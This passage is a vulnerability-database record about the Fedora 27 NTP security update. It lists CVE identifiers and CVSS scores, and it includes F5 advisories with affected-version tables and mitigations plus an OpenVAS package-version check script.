ID: FEDORA:8746560A764C
Type: fedora
Reporter: Fedora
Modified: 2018-03-27T20:16:30
Description
The Network Time Protocol (NTP) is used to synchronize a computer's time with another reference time source. This package includes ntpd (a daemon which continuously adjusts system time) and utilities used to query and configure the ntpd daemon. Perl scripts are in the ntp-perl package, ntpdate is in the ntpdate package and sntp is in the sntp package. The documentation in HTML format is in the ntp-doc package.
{"id": "FEDORA:8746560A764C", "type": "fedora", "bulletinFamily": "unix", "title": "[SECURITY] Fedora 27 Update: ntp-4.2.8p11-1.fc27", "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time with another reference time source. This package includes ntpd (a daemon which continuously adjusts system time) and utilities used to query and configure the ntpd daemon. Perl scripts are in the ntp-perl package, ntpdate is in the ntpdate package and sntp is in the sntp package. The documentation in HTML format is in the ntp-doc package. ", "published": "2018-03-27T20:16:30", "modified": "2018-03-27T20:16:30", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Fedora", "references": [], "cvelist": ["CVE-2016-1549", "CVE-2018-7170", "CVE-2018-7182", "CVE-2018-7183", "CVE-2018-7184", "CVE-2018-7185"], "lastseen": "2020-12-21T08:17:54", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "f5", "idList": ["F5:K65271605", "F5:K82570157", "F5:K51743312", "F5:K38742515", "F5:K13540723", "F5:K04912972", "SOL65271605"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201210", "OPENVAS:1361412562310874283", "OPENVAS:1361412562310843586", "OPENVAS:1361412562311220201457", "OPENVAS:1361412562310812790", "OPENVAS:1361412562310812792", "OPENVAS:1361412562310812791", "OPENVAS:1361412562310875100", "OPENVAS:1361412562310812793", "OPENVAS:1361412562311220192215"]}, {"type": "freebsd", "idList": ["AF485EF4-1C58-11E8-8477-D05099C0AE8C"]}, {"type": "archlinux", "idList": ["ASA-201803-11"]}, {"type": "nessus", "idList": ["SUSE_SU-2018-1765-2.NASL", "SLACKWARE_SSA_2018-060-02.NASL", "GENTOO_GLSA-201805-12.NASL", "NTP_4_2_8P11.NASL", "FREEBSD_PKG_AF485EF41C5811E88477D05099C0AE8C.NASL", "SUSE_SU-2018-1765-1.NASL", "OPENSUSE-2018-376.NASL", "SUSE_SU-2018-1464-1.NASL", "SUSE_SU-2018-0956-1.NASL", "SUSE_SU-2018-0808-1.NASL"]}, {"type": "fedora", "idList": ["FEDORA:B80B9607548F", "FEDORA:D24F26076D26", 
"FEDORA:D00D36075DA4", "FEDORA:B6F06606E5A6"]}, {"type": "slackware", "idList": ["SSA-2018-229-01", "SSA-2018-060-02"]}, {"type": "gentoo", "idList": ["GLSA-201805-12"]}, {"type": "amazon", "idList": ["ALAS-2018-1009", "ALAS-2018-1083", "ALAS2-2018-1009"]}, {"type": "aix", "idList": ["NTP_ADVISORY10.ASC", "NTP_ADVISORY11.ASC"]}, {"type": "cve", "idList": ["CVE-2018-7170", "CVE-2018-7182", "CVE-2018-7185", "CVE-2018-7183", "CVE-2016-1549", "CVE-2018-7184"]}, {"type": "symantec", "idList": ["SMNTC-103339", "SMNTC-1451"]}, {"type": "ubuntu", "idList": ["USN-4563-1", "USN-3707-1", "USN-3707-2"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:395B2EFFF922C38DE193A0DDFFA06D6E"]}, {"type": "seebug", "idList": ["SSV:96788"]}, {"type": "talos", "idList": ["TALOS-2016-0083"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:89AFE2575D3AAEFB0E0D6881A13995A5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:150341"]}, {"type": "exploitdb", "idList": ["EDB-ID:45846"]}, {"type": "zdt", "idList": ["1337DAY-ID-31596"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:3452-1", "OPENSUSE-SU-2018:3438-1"]}], "modified": "2020-12-21T08:17:54", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2020-12-21T08:17:54", "rev": 2}, "vulnersScore": 6.4}, "affectedPackage": [{"OS": "Fedora", "OSVersion": "27", "arch": "any", "packageName": "ntp", "packageVersion": "4.2.8p11", "packageFilename": "UNKNOWN", "operator": "lt"}]}
{"f5": [{"lastseen": "2019-09-30T20:28:25", "bulletinFamily": "software", "cvelist": ["CVE-2018-7170", "CVE-2016-1549"], "description": "\nF5 Product Development has assigned ID 710387 (BIG-IP), ID 710554 (BIG-IQ), and ID 710553 (Enterprise Manager) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H82570157 on the **Diagnostics** > **Identified** > **Low** page. \n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator, WebSafe) | 13.x | 13.1.0 \n13.0.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N>) | NTP configured to use symmetric keys \n12.x | 12.1.0 - 12.1.3 | None \n11.x | 11.6.3 \n11.5.1 - 11.5.5 \n11.2.1 | None \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | 3.1.1 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N>) | NTP configured to use symmetric keys \nBIG-IQ Centralized Management | 5.x | 5.0.0 - 5.4.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N>) | NTP configured to use symmetric keys \n4.x | 4.6.0 | None \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N>) | NTP configured to 
use symmetric keys \nF5 iWorkflow | 2.x | 2.0.1 - 2.3.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N>) | NTP configured to use symmetric keys \nLineRate | 2.x | None | Not applicable | Not vulnerable | None | None \nTraffix SDC | 5.x | None | Not applicable | Not vulnerable | None | None \n4.x | None | Not applicable \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\n**Note**: For details about how Security Advisory articles are versioned, and what versions are listed in the table, refer to [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>).\n\n \nMitigation\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-03-28T00:39:00", "published": "2018-03-19T19:32:00", "id": "F5:K82570157", "href": "https://support.f5.com/csp/article/K82570157", "title": "NTP 
vulnerability CVE-2018-7170", "type": "f5", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-11-13T23:21:22", "bulletinFamily": "software", "cvelist": ["CVE-2018-7185"], "description": "\nF5 Product Development has assigned ID 713558 (BIG-IP), ID 713694 (BIG-IQ and iWorkflow), ID 713693 (Enterprise Manager), and ID CPF-24832, CPF-24833, and CPF-24834 (Traffix SDC) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H04912972 on the **Diagnostics** > **Identified** > **Low** page. \n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator, WebSafe) | 13.x | 13.0.0 - 13.1.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | NTP \n12.x | 12.1.0 - 12.1.3 | None \n11.x | 11.5.1 - 11.6.3 | None \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | 3.1.1 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | None \nBIG-IQ Centralized Management | 5.x | 5.0.0 - 5.4.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | None \n4.x | 4.6.0 | None \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | Low | 
[3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | None \nF5 iWorkflow | 2.x | 2.0.2 - 2.3.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | None \nLineRate | 2.x | None | Not applicable | Not vulnerable | None | None \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | None \n4.x | 4.0.5 - 4.4.0 | None \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nThere is no mitigation. 
However, F5 recommends that you configure multiple time sources, and restrict access to the network segments that are used to communicate with the NTP peer to avoid spoofed traffic.\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K15113: BIG-IQ hotfix matrix](<https://support.f5.com/csp/article/K15113>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>)\n", "edition": 1, "modified": "2018-04-18T02:37:00", "published": "2018-04-10T10:41:00", "id": "F5:K04912972", "href": "https://support.f5.com/csp/article/K04912972", "title": "NTP vulnerability CVE-2018-7185", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-09-19T18:27:23", "bulletinFamily": "software", "cvelist": ["CVE-2018-7183"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be 
vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-03-12T20:07:00", "published": "2018-03-12T20:07:00", "id": "F5:K51743312", "href": "https://support.f5.com/csp/article/K51743312", "title": "NTP vulnerability CVE-2018-7183", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-09-18T20:27:05", "bulletinFamily": "software", "cvelist": ["CVE-2018-7182"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-03-12T20:02:00", "published": 
"2018-03-12T20:02:00", "id": "F5:K38742515", "href": "https://support.f5.com/csp/article/K38742515", "title": "NTP vulnerability CVE-2018-7182", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-10-07T18:28:56", "bulletinFamily": "software", "cvelist": ["CVE-2016-1549"], "description": "\nF5 Product Development has assigned ID 591985 (BIG-IP), ID 594057 (BIQ-IQ), ID 594059 (Enterprise Manager), and ID 507785 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H65271605 on the **Diagnostics** > **Identified** > **Low** screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.0.0 - 11.6.3 \n10.1.0 - 10.2.4 | None | Low | ntpd \nBIG-IP AAM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.3 | None | Low | ntpd \nBIG-IP AFM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.3.0 - 11.6.3 | None | Low | ntpd \nBIG-IP Analytics | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.0.0 - 11.6.3 | None | Low | ntpd \nBIG-IP APM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.0.0 - 11.6.3 \n10.1.0 - 10.2.4 | None | Low | ntpd \nBIG-IP ASM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.0.0 - 11.6.3 \n10.1.0 - 10.2.4 | None | Low | ntpd \nBIG-IP DNS | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 | None | Low | ntpd \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None | Low | ntpd \nBIG-IP GTM | 11.0.0 - 11.6.3 \n10.1.0 - 10.2.4 | None | Low | ntpd \nBIG-IP Link Controller | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.0.0 
- 11.6.3 \n10.1.0 - 10.2.4 | None | Low | ntpd \nBIG-IP PEM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.3.0 - 11.6.3 | None | Low | ntpd \nBIG-IP PSM | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | None | Low | ntpd \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None | Low | ntpd \nBIG-IP WOM | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | None | Low | ntpd \nARX | 6.0.0 - 6.4.0 | None | Low | ntpd \nEnterprise Manager | 3.0.0 - 3.1.1 | None | Low | ntpd \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | Not vulnerable | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | Low | ntpd \nBIG-IQ Device | 4.2.0 - 4.5.0 | None | Low | ntpd \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Low | ntpd \nBIG-IQ ADC | 4.5.0 | None | Low | ntpd \nBIG-IQ Centralized Management | 4.6.0 | None | Low | ntpd \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | Low | ntpd \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nF5 MobileSafe | None | 1.0.0 | Not vulnerable | None \nF5 WebSafe | None | 1.0.0 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, if configured, disable trustedkey authentication for NTP and/or ensure that the private key is known only to trusted hosts. 
Additionally, you can configure multiple time sources to mitigate the risk of any single time source being impacted by this attack.\n\n**Impact of action:** Performing the suggested action should not have a negative impact on your system.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [NTP FAQ - Advanced Configuration](<http://www.ntp.org/ntpfaq/NTP-s-config-adv.htm>) \n \n**Note**: This link takes you to a resource outside of AskF5. The third party could remove the document without our knowledge.\n", "edition": 1, "modified": "2018-04-02T21:46:00", "published": "2016-06-13T20:07:00", "id": "F5:K65271605", "href": "https://support.f5.com/csp/article/K65271605", "title": "NTP vulnerability CVE-2016-1549", "type": "f5", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2016-09-26T17:23:26", "bulletinFamily": "software", "cvelist": ["CVE-2016-1549"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. 
The **Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability, if configured, disable trustedkey authentication for NTP and/or ensure that the private key is known only to trusted hosts. Additionally, you can configure multiple time sources to mitigate the risk of any single time source being impacted by this attack.\n\n**Impact of action:** Performing the suggested action should not have a negative impact on your system.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * [NTP FAQ - Advanced Configuration](<http://www.ntp.org/ntpfaq/NTP-s-config-adv.htm>) \n \n**Note**: This link takes you to a resource outside of AskF5. The third party could remove the document without our knowledge.\n", "modified": "2016-06-13T00:00:00", "published": "2016-06-13T00:00:00", "id": "SOL65271605", "href": "http://support.f5.com/kb/en-us/solutions/public/k/65/sol65271605.html", "type": "f5", "title": "SOL65271605 - NTP vulnerability CVE-2016-1549", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-25T19:33:59", "bulletinFamily": "software", "cvelist": ["CVE-2018-7184", "CVE-2015-7704"], "description": "\nF5 Product Development has assigned ID 709048 (BIG-IP), ID 709180 (BIG-IQ), ID 709179 (Enterprise Manager), and ID CPF-24829, CPF-24830, and CPF-24831 (Traffix SDC) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H13540723 on the **Diagnostics** > **Identified** > **Low** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. 
To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator, WebSafe) | 13.x | 13.0.0 - 13.1.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | NTP \n12.x | 12.1.0 - 12.1.3 | None \n11.x | 11.6.1 - 11.6.3 \n11.5.1 - 11.5.6 \n11.2.1 | None \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | 3.1.1 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | NTP \nBIG-IQ Centralized Management | 5.x | 5.0.0 - 5.4.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | NTP \n4.x | 4.6.0 | None \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | NTP \nF5 iWorkflow | 2.x | 2.0.1 - 2.3.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | NTP \nLineRate | 2.x | None | Not applicable | Not vulnerable | None | None \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | Low | [3.1](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>) | NTP \n4.x | 4.0.5 - 4.4.0 | None \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a 
version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you can use server mode instead of peer mode, enable peer authentication, configure multiple time sources, and/or restrict access to the network segments that are used to communicate with the NTP peer to avoid spoofed traffic.\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2018-05-03T02:33:00", "published": "2018-03-26T19:24:00", "id": "F5:K13540723", "href": "https://support.f5.com/csp/article/K13540723", "title": "NTP vulnerability CVE-2018-7184", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:33:01", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "description": "The remote host is 
missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-03-28T00:00:00", "id": "OPENVAS:1361412562310874283", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874283", "type": "openvas", "title": "Fedora Update for ntp FEDORA-2018-de113aeac6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_de113aeac6_ntp_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for ntp FEDORA-2018-de113aeac6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874283\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-28 08:57:55 +0200 (Wed, 28 Mar 2018)\");\n script_cve_id(\"CVE-2016-1549\", \"CVE-2018-7170\", \"CVE-2018-7182\", \"CVE-2018-7183\",\n \"CVE-2018-7184\", \"CVE-2018-7185\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for ntp FEDORA-2018-de113aeac6\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ntp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"ntp on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-de113aeac6\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAWSWGYT4BYAU6JMQXZOD22NFWPCVJQP\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", 
\"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.8p11~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7184", "CVE-2018-7185", "CVE-2018-7183", "CVE-2018-12327", "CVE-2018-7170", "CVE-2016-1549", "CVE-2018-7182"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-09-27T00:00:00", "id": "OPENVAS:1361412562310875100", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875100", "type": "openvas", "title": "Fedora Update for ntp FEDORA-2018-7051d682fa", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# 